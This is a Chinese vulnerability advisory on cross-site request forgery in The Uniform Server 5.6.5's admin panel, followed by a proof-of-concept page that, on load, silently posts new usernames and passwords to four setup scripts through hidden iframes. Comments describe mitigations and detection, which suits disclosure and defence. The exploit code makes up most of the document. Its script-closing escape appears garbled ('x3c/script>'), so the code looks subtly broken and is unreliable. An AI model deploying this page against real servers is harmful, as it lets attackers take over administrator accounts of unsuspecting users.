The Uniform Server多个页面跨站请求伪造漏洞

来源:岁月联盟 编辑:老鹰 时间:2010-06-04

影响版本:
The Uniform Server 5.6.5

程序介绍:
The Uniform Server是一个可以运行在任何基于Windows操作系统之上的WAMP软件包。

漏洞分析:

The Uniform Server在执行某些操作前没有对HTTP请求进行有效性检查,远程攻击者可以诱使已登录的管理员访问恶意页面,向apsetup.php、psetup.php、sslpsetup.php、mqsetup.php等脚本发送POST请求,从而执行跨站请求伪造攻击,更改管理员口令。

漏洞利用:

<!-- Advisory proof-of-concept page. It demonstrates that the four apanel
     setup scripts listed below accept a credential-changing POST that
     originates from a page on another origin: the browser attaches the
     administrator's existing session cookie, and the server requires no
     request-specific secret, so it cannot tell this submission apart from
     one made through its own form.
     Mitigation is server-side: bind each of these forms to a per-session
     anti-CSRF token and verify it on POST, reject cross-origin requests
     (Origin/Referer check), and require the current password before
     accepting a new one. For detection, look for POSTs to these scripts
     carrying a foreign Referer/Origin, or password changes with no
     matching interactive admin login. -->
<html>  
<head>  
    <script type="text/javascript">  
        // Fires as soon as the page has loaded; no user interaction is
        // involved beyond visiting the page.
        window.onload = function() {  
            // Base URL of the administration panel the advisory describes.
            var url = 'http://localhost/apanel';  
              
            // One entry per affected setup script. Each entry mirrors the
            // form that script expects: parameter names as the server reads
            // them, placeholder values, and the inline call that submits it.
            var xsrs = [  
                {  
                    // apsetup.php: fields apuser / appass (presumably the
                    // Apache-panel credentials; confirm against the server).
                    "action": url + "/apsetup.php",  
                    "method": "post",  
                    "submitCall": "document.forms[0].submit.click()",  
                    "fields": [  
                        { "name": "apuser", "value": "new_username" },  
                        { "name": "appass", "value": "new_password" },  
                        { "name": "submit", "value": "Change", "type": "submit" }  
                    ]  
                },  
                {  
                    // psetup.php: fields puser / ppass.
                    "action": url + "/psetup.php",  
                    "method": "post",  
                    "submitCall": "document.forms[0].submit.click()",  
                    "fields": [  
                        { "name": "puser", "value": "new_username" },  
                        { "name": "ppass", "value": "new_password" },  
                        { "name": "submit", "value": "Change", "type": "submit" }  
                    ]  
                },  
                {  
                    // sslpsetup.php: same field names as psetup.php.
                    "action": url + "/sslpsetup.php",  
                    "method": "post",  
                    "submitCall": "document.forms[0].submit.click()",  
                    "fields": [  
                        { "name": "puser", "value": "new_username" },  
                        { "name": "ppass", "value": "new_password" },  
                        { "name": "submit", "value": "Change", "type": "submit" }  
                    ]  
                },  
                {  
                    // mqsetup.php: only a password field, qpass.
                    "action": url + "/mqsetup.php",  
                    "method": "post",  
                    "submitCall": "document.forms[0].submit.click()",  
                    "fields": [  
                        { "name": "qpass", "value": "new_password" },  
                        { "name": "submit", "value": "Change", "type": "submit" }  
                    ]  
                }  
            ];  
  
            // For every target, render a self-submitting form inside its own
            // iframe so all four POSTs are issued from one page visit.
            for (var x = 0; x < xsrs.length; x++) {  
                var attackFrame = document.createElement('iframe');  
  
                var html = '<html><body><form action="' + xsrs[x].action + '" ' +  
                    'method="' + xsrs[x].method + '">';  
  
                // Fields default to type="hidden"; only the entry that sets a
                // "type" (the submit button) is rendered differently.
                for (var y = 0; y < xsrs[x].fields.length; y++) {  
                    html += '<input type="' +  
                        (xsrs[x].fields[y].type != null ?  
                            xsrs[x].fields[y].type : 'hidden') + '" ' +  
                        'name="' + xsrs[x].fields[y].name + '" ' +  
                        'value="' + xsrs[x].fields[y].value + '" />';  
                }  
  
                // Append the inline script that clicks the submit button, so the
                // form posts as soon as the iframe document is written.
                html += '</form><script>' + xsrs[x].submitCall + 'x3c/script></body></html>';  
  
                document.body.appendChild(attackFrame);  
  
                // Writing the markup into the frame renders the form and runs
                // the inline submit call.
                attackFrame.contentDocument.write(html);  
            }  
        }  
    </script>
</head>
<body>
</body>
</html>

解决方案:
厂商补丁:
Uniform Server Development Team
-------------------------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.uniformserver.com/